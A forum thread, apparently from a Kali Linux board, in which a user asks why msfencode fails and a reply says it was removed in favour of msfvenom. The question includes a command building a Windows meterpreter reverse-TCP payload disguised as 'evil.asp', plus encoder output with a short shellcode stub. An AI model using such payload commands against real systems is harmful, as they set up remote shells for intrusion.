Results 1 to 2 of 2

Thread: Metasploit msfencode not working?

  1. #1
    Join Date
    2013-Mar
    Posts
    77

    Question Metasploit msfencode not working?

    Hi

    I am running from:

    Code:
    root@kali:/usr/share/framework2
    the command:

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.456.789.000 LPORT=1234 R | ./msfencode -o evil.asp
    and i am getting this:

    Code:
    [*] Msf::Encoder::PexFnstenvMov failed to return an encoded payload[*] Msf::Encoder::OSXPPCLongXORTag failed, doesn't support all architectures[*] Using Msf::Encoder::Countdown with final size of 20 bytes
    "\x29\xc9\xb9\xff\xff\xff\xff\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c".
    "\x0e\x07\xe2\xfa";
    Last edited by pamamolf; 2015-09-08 at 18:03.

  2. #2
    Join Date
    2015-Sep
    Posts
    8
    Quote Originally Posted by pamamolf View Post
    Hi

    I am running from:

    Code:
    root@kali:/usr/share/framework2
    the command:

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.456.789.000 LPORT=1234 R | ./msfencode -o evil.asp
    and i am getting this:

    Code:
    [*] Msf::Encoder::PexFnstenvMov failed to return an encoded payload[*] Msf::Encoder::OSXPPCLongXORTag failed, doesn't support all architectures[*] Using Msf::Encoder::Countdown with final size of 20 bytes
    "\x29\xc9\xb9\xff\xff\xff\xff\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c".
    "\x0e\x07\xe2\xfa";

    U cant use msfencode anymore. Cause deleted from metasploit. Try with msfvenom and -e (encode) parameter.

Similar Threads

  1. msfencode will not start properly
    By h0lograph in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2014-03-18, 04:10
  2. metasploit web ui, anyone get it working?
    By m4xx3d0ut in forum ARM Archive
    Replies: 0
    Last Post: 2013-12-26, 19:16

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •